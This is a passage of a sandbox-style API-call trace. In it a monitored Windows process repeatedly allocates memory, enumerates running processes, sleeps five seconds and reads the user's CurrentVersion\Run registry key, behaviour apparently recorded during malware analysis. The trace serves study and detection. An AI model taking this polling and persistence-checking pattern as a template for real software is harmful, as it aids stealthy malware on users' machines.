BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.816] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.817] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.823] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.824] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.826] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.827] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.827] NtClose (Handle=0x274) returned 0x0 [0179.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.830] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.831] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.835] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.848] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.850] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.851] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.851] NtClose (Handle=0x274) returned 0x0 [0179.851] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.854] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.854] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.862] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.863] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.867] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.867] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.867] NtClose (Handle=0x274) returned 0x0 [0179.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.872] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.872] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.880] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.881] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.882] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.884] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.884] NtClose (Handle=0x274) returned 0x0 [0179.884] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.884] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.886] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.887] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.892] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.893] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.897] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.898] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.898] NtClose (Handle=0x274) returned 0x0 [0179.898] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.901] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.902] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.909] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.911] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.911] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.911] NtClose (Handle=0x274) returned 0x0 [0179.911] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.915] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.916] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.922] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.924] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.928] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.930] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.930] NtClose (Handle=0x274) returned 0x0 [0179.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.933] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.933] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.938] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.939] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.941] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.942] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.942] NtClose (Handle=0x274) returned 0x0 [0179.942] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.945] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.951] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.952] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.955] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.955] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.955] NtClose (Handle=0x274) returned 0x0 [0179.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.959] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.959] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.959] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.966] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.970] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.971] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.972] NtClose (Handle=0x274) returned 0x0 [0179.972] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.975] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.980] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.983] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.984] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.984] NtClose (Handle=0x274) returned 0x0 [0179.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.987] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.987] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.993] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.994] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.996] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.996] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.996] NtClose (Handle=0x274) returned 0x0 [0179.996] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.997] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.008] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.009] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.010] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.012] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.012] NtClose (Handle=0x274) returned 0x0 [0180.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.015] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.015] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 